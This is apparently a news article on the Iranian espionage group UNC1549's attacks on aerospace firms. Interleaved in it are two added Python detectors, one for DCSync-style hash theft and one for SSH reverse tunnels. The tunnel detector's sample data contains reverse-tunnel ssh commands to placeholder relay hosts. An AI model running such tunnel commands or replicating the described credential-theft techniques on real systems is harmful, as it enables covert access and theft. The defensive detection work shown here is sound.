Iran-Nexus Threat Actor UNC1549 Takes Aim at Aerospace
Recorded: Nov. 19, 2025, 3:03 a.m.
Original
Iran-Nexus Threat Actor UNC1549 Takes Aim at Aerospace

Researchers say Israel remains a central focus, with UNC1549 targeting aerospace and defense entities in the US, the UAE, Qatar, Spain, and Saudi Arabia.

Alexander Culafi, Senior News Writer, Dark Reading
November 18, 2025

An Iran-nexus threat actor known for espionage has been targeting organizations in the aerospace sector.

Researchers for Google Cloud's Mandiant said as much in a Nov. 17 blog post dedicated to a threat actor tracked as UNC1549. Google previously reported on the actor, which is thought to overlap with the Iranian Revolutionary Guard Corps (IRGC)-linked group Tortoiseshell, early last year. At the time, Mandiant reported the group was compromising systems at aerospace and defense firms across multiple countries, including Israel and the United Arab Emirates.

In Mandiant's latest blog post, researchers cover tactics, techniques, and procedures (TTPs) observed in incidents attributed to UNC1549 that Mandiant has responded to since mid-2024. Austin Larsen, principal threat analyst for the Google Threat Intelligence Group, says that while Israel remains a central focus, UNC1549's targeting has expanded to include more organizations in the US, the UAE, Qatar, Spain, and Saudi Arabia. "We are seeing a broadening of their operational scope beyond just direct military rivals.
They are targeting sectors like technology, hospitality, and transportation, often using those intrusions to leverage trusted relationships and hop into their ultimate targets in the aerospace and defense sectors," he explains.

Adam Meyers, CrowdStrike's senior vice president of counter adversary, tells Dark Reading that in the case of this threat actor in particular (which CrowdStrike tracks as "Imperial Kitten"), the security vendor has seen it expand its infrastructure and ramp up espionage activity in alignment with the interests of the IRGC since this past summer.

"Their campaigns often use job-themed phishing lures to compromise victims and deliver malicious payloads. Previous operations have targeted Western countries, as well as Israel, Saudi Arabia, and the UAE, with a wide range of industries in scope — including defense, hospitality, finance, transportation, and technology."

ESET senior threat intelligence analyst Adam Burgher, meanwhile, says ESET has observed the actor (which it calls "GalaxyGato") targeting Israel and Greece for the past six months.

The US Department of Homeland Security warned in June that Iranian threat actors or hacktivists could target US-based critical infrastructure operators. And in recent months, Iran-linked attackers have conducted a wide range of threat campaigns targeting everything from Europe to telecommunications firms.

UNC1549's Continued Onslaught Against Aerospace

Mandiant's post, authored by Mohamed El-Banna, Daniel Lee, Mike Stokkel, and Josh Goddard, asserts that since the middle of last year, UNC1549 has targeted organizations in aerospace, aviation, and defense using a sophisticated approach.

Sometimes, attackers would craft spear-phishing attacks designed to steal credentials or deliver malware to the target.
Other times, UNC1549 would first compromise a third-party supplier or business partner and then exploit that trust to go after the main target. "The latter technique is particularly strategic when targeting organizations with high security maturity, such as defense contractors. While these primary targets often invest heavily in robust defenses, their third-party partners may possess less stringent security postures," the blog post read. "This disparity provides UNC1549 a path of lesser resistance, allowing them to circumvent the primary target's main security controls by first compromising a connected entity."

The actor also uses sophisticated post-exploitation tactics, such as stealing source code to use for lookalike domains in future spear-phishing campaigns and abusing service ticketing systems to trick employees into giving up sensitive credentials. Additionally, UNC1549 would use a series of custom tools both to open backdoors and to maintain persistence. Some tools the research highlighted include Twostroke, a C++ backdoor for communicating with command-and-control (C2) infrastructure; Lightrail, a custom tunneller; Deeproot, a shell command executor, system info enumerator, and file manager; and a tool named DCSyncer.Slick, which mimics the legitimate DCSync Active Directory replication feature in order to "extract NTLM password hashes directly from the domain controllers," Mandiant wrote.

To avoid defenses, attackers would delete utilities and other forensic artifacts.
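The DCSyncer.Slick description above (a tool that mimics DCSync replication to pull NTLM hashes from domain controllers) maps to a well-known detection: Windows Security event 4662 on the domain controller records which replication control-access rights a principal exercised, and any principal other than another domain controller's machine account asking for them deserves an alert. The following Python is an added example written for this page; it is not Mandiant's or Google's detection code. The 4662 records are constructed samples, and the code assumes the caller supplies a complete list of domain-controller hostnames (`KNOWN_DCS` is a placeholder).

```python
"""Flag DCSync-style directory replication requests in Windows Security event
4662 records. Added example for this article, not Mandiant's detection logic;
the event records below are constructed samples, not real telemetry."""
import re

# Extended-right GUIDs that appear in the Properties field of event 4662 when a
# principal asks a domain controller for replication data. DCSync-style tools
# need DS-Replication-Get-Changes plus -Get-Changes-All to read secrets.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dca9": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dca9": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def is_expected_replicator(subject_user, domain_controllers):
    """Domain controllers replicate with each other using their machine
    accounts (NAME$); anything else exercising replication rights is suspect.
    Assumes the caller supplies a complete list of DC hostnames."""
    if not subject_user.endswith("$"):
        return False
    return subject_user[:-1].upper() in {dc.upper() for dc in domain_controllers}


def find_dcsync_like(events, domain_controllers):
    """Return one finding per 4662 event in which a non-DC principal exercised
    a replication right. Events are dicts in the shape a SIEM would hand over."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        if not rights:
            continue  # some other object access, not replication
        if is_expected_replicator(ev["SubjectUserName"], domain_controllers):
            continue  # DC-to-DC replication is normal
        findings.append({
            "user": ev.get("SubjectDomainName", "") + "\\" + ev["SubjectUserName"],
            "dc": ev.get("Computer"),
            "rights": rights,
            # Get-Changes-All is the right that lets the caller read password hashes.
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return findings


# Constructed sample events (not real telemetry). Properties mimics the
# multi-line text Windows emits: the GUIDs of the rights that were exercised.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "DC02$",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dca9}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dca9}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "svc_backup",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dca9}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dca9}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "jdoe",
     "Properties": "Read Property\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # unrelated property GUID (sample)
    {"EventID": 4662, "Computer": "DC03.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "WKS-042$",
     "Properties": "Control Access\n\t{89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"EventID": 4624, "Computer": "DC01.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "jdoe", "Properties": ""},
]
KNOWN_DCS = ["DC01", "DC02", "DC03"]  # placeholder: feed the real DC inventory here


def demo():
    return find_dcsync_like(SAMPLE_EVENTS, KNOWN_DCS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Running it reports the `svc_backup` request (a user account holding both Get-Changes rights, rated high) and the `WKS-042$` request (a workstation machine account, which should never replicate, rated medium); the DC02$ record is suppressed as ordinary DC-to-DC replication. Environments with directory synchronisation services (for example an identity sync connector account) should add those accounts to the allow list rather than weaken the rule.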
They also "repeatedly used SSH reverse tunnels from victim hosts back to their infrastructure, a technique that helped hide their activity from [endpoint detection and response] agents installed on those systems."

Why UNC1549 Targets Aerospace

Although Iran targets many sectors and areas of the world to further its geopolitical interests, it is notable that Mandiant's tracking of UNC1549 involves campaigns targeting a narrow range of verticals. The post's authors stated that the threat actor's operations appear "strongly motivated by espionage," citing extensive data collection from victim networks. Google saw UNC1549 steal sensitive information such as emails, network and IT documentation, and intellectual property.

Austin Larsen, principal threat analyst for the Google Threat Intelligence Group, tells Dark Reading that the threat actor seems primarily motivated by strategic intelligence gathering rather than something like destructive pre-positioning. While their actions point to a goal of acquiring proprietary and military secrets, Larsen says another major goal is to use compromised aerospace and defense firms as a vehicle to target other valuable organizations.

"A major driver for targeting this specific vertical is the ability to use these organizations as pivot points. We see them exploiting trusted connections with third-party suppliers to reach high-value targets, often compromising smaller vendors to bypass the robust defenses of major defense contractors," Larsen says.

On the military intelligence front, Jeremy Makowski, senior security researcher at Rapid7, says aerospace organizations are especially valuable to Iran because gained intel can "significantly speed up progress in areas where Tehran struggles to legally obtain advanced technology."

"Militarily, it helps compensate for an outdated air force and limited access to modern aircraft.
Information on propulsion, radar systems, satellite technologies, and precision-guidance components directly benefits Iran's expanding missile and drone programs, fields where even minor improvements can shift the strategic balance. But the value isn't purely military," he says. "Aerospace espionage enables Iran to identify restricted components, track global suppliers, and circumvent sanctions through covert procurement networks. It also supports political objectives by showcasing technological advancement to domestic audiences, signaling deterrence abroad, and equipping regional proxy groups with more capable systems."

About the Author

Alexander Culafi, Senior News Writer, Dark Reading

Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.
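The SSH reverse tunnel technique quoted in the article (remote port forwarding with `-R` from a victim host back to attacker infrastructure, which leaves EDR looking at a legitimate ssh client) is still visible in process-creation telemetry such as Sysmon event 1, Security event 4688 or auditd execve records. The following Python is an added example written for this page, not Mandiant's detection logic; it parses ssh command lines for remote forwards the way OpenSSH's own option parser reads them (clustered flags such as `-fNR`, attached arguments such as `-R2222:...`, and `-o RemoteForward=...`) and rates a hit higher when `-N` (forward only, no command) is present. The process events are constructed samples and the hostnames are placeholders.

```python
"""Flag SSH reverse tunnels (-R / RemoteForward) in process-creation telemetry.
Added example for this article, not Mandiant's detection logic; the process
events below are constructed samples and the hostnames are placeholders."""
import re
import shlex

SSH_BINARIES = {"ssh", "ssh.exe"}
# OpenSSH single-letter options that consume an argument. Everything else in a
# flag cluster (-f, -N, -q, ...) stands alone, so the first of these ends the
# cluster exactly as the ssh client's getopt loop sees it.
ARG_OPTS = set("BbcDEeFIiJLlmOopQRSWw")
# -o accepts either "RemoteForward=spec" or "RemoteForward spec".
REMOTE_FORWARD_RE = re.compile(r"^remoteforward[=\s]+(.+)$", re.I)


def _split(cmdline):
    # Windows command lines carry backslashes that POSIX shlex would treat as
    # escapes, so use POSIX rules only when none are present.
    try:
        tokens = shlex.split(cmdline, posix="\\" not in cmdline)
    except ValueError:  # unbalanced quotes: degrade rather than crash the pipeline
        tokens = cmdline.split()
    return [t.strip('"') for t in tokens]


def parse_ssh_tunnel(cmdline):
    """Return {"remote_forwards": [...], "no_command": bool} for an ssh
    invocation, or None when the command line is not the ssh client at all."""
    argv = _split(cmdline)
    if not argv:
        return None
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in SSH_BINARIES:
        return None
    forwards, no_command = [], False
    i = 1
    while i < len(argv):
        tok = argv[i]
        if len(tok) > 1 and tok[0] == "-" and tok[1] != "-":
            for pos, ch in enumerate(tok[1:], start=1):
                if ch == "N":            # -N: forward ports only, run no command
                    no_command = True
                if ch in ARG_OPTS:
                    arg = tok[pos + 1:]  # attached argument, e.g. -R2222:host:22
                    if not arg:          # otherwise the argument is the next token
                        i += 1
                        arg = argv[i] if i < len(argv) else ""
                    if ch == "R":
                        forwards.append(arg)
                    elif ch == "o":
                        m = REMOTE_FORWARD_RE.match(arg.strip())
                        if m:
                            forwards.append(m.group(1).strip())
                    break
        i += 1
    return {"remote_forwards": forwards, "no_command": no_command}


def triage_process_events(events):
    """Events are dicts with Computer, User and CommandLine, as Sysmon event 1
    or Security 4688 would provide. Returns one finding per reverse tunnel."""
    findings = []
    for ev in events:
        info = parse_ssh_tunnel(ev["CommandLine"])
        if not info or not info["remote_forwards"]:
            continue
        findings.append({
            "host": ev["Computer"],
            "user": ev["User"],
            "forwards": info["remote_forwards"],
            # A forward with -N is a tunnel and nothing else; with a shell
            # attached it may still be an administrator's legitimate session.
            "severity": "high" if info["no_command"] else "medium",
        })
    return findings


# Constructed sample process events (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "eng-ws-07", "User": "CORP\\jdoe",
     "CommandLine": "ssh -fN -R 2222:127.0.0.1:22 relay@relay.example.net"},
    {"Computer": "build-01", "User": "CORP\\ci",
     "CommandLine": "ssh -p 22 -L 8080:localhost:80 admin@bastion.example.net"},
    {"Computer": "fileserv-02", "User": "CORP\\svc_backup",
     "CommandLine": "ssh -oRemoteForward=0.0.0.0:8443:localhost:443 user@relay.example.net"},
    {"Computer": "eng-ws-12", "User": "CORP\\asmith",
     "CommandLine": "scp report.pdf user@bastion.example.net:/tmp/"},
    {"Computer": "hr-ws-03", "User": "CORP\\svc_backup",
     "CommandLine": '"C:\\Windows\\System32\\OpenSSH\\ssh.exe" -N -R 3389:localhost:3389 svc@relay.example.net'},
]


def demo():
    return triage_process_events(SAMPLE_EVENTS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Of the five sample events, three are reported: the `-fN -R` tunnel and the Windows `-N -R` tunnel as high, and the `-oRemoteForward=` session as medium; the local forward (`-L`) and the `scp` copy are ignored. Because the parser consumes option arguments the way the ssh client does, a user name or host that happens to contain the letter `R` never produces a false match, and unbalanced quoting degrades to whitespace splitting instead of dropping the event.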
Summarized

UNC1549, an Iran-nexus threat actor, has significantly expanded its targeting beyond Israel to encompass a broader range of aerospace and defense entities globally. As detailed by Google Cloud's Mandiant, the actor, previously tracked as Tortoiseshell, has been actively engaged in espionage activities since mid-2024, with a primary motivation focused on strategic intelligence gathering. Initially concentrated on targets in Israel and the United Arab Emirates, UNC1549's operations have broadened to include the US, Qatar, Spain, and Saudi Arabia. Researchers observed sophisticated TTPs employed by the group, including spear-phishing campaigns targeting credentials, leveraging third-party suppliers to compromise primary defense contractors, and utilizing custom tools like Twostroke (a C++ backdoor), Lightrail (a tunneller), Deeproot (a shell command executor), and DCSyncer (mimicking Active Directory replication to exfiltrate NTLM password hashes). To avoid detection, the group employed tactics such as deleting forensic artifacts and establishing SSH reverse tunnels.

The motivations behind UNC1549's sustained targeting of the aerospace sector are multi-faceted. According to Google's analysis, the primary driver is strategic intelligence: collecting sensitive data like emails, network documentation, and intellectual property. However, Mandiant's tracking reveals a secondary goal: utilizing compromised aerospace and defense firms as pivot points to reach higher-value targets, particularly those involved in military technology. Jeremy Makowski, a senior security researcher at Rapid7, highlighted that aerospace organizations are particularly valuable to Iran due to the intelligence gained, which can "significantly speed up progress in areas where Tehran struggles to legally obtain advanced technology." Specifically, gaining insights into propulsion systems, radar technology, satellite technologies, and precision-guidance components directly benefits Iran's missile and drone programs. Beyond military applications, the espionage also helps Iran circumvent sanctions by identifying restricted components, tracking global suppliers, and creating covert procurement networks.

The group's tactics reflect a deliberate strategy to exploit trust relationships. As outlined by Austin Larsen, Principal Threat Analyst for the Google Threat Intelligence Group, UNC1549 utilizes these connections to "pivot," leveraging trusted third-party suppliers to bypass the robust defenses of major defense contractors. This approach effectively allows them to circumvent defensive layers.

Ultimately, UNC1549's actions underscore the geopolitical significance of the aerospace sector and the ongoing strategic competition between nations. The threat actor's continued operation demonstrates Iran's commitment to information gathering and technological advancement, highlighting the necessity for organizations within the aerospace and defense industries to meticulously assess and bolster their security postures.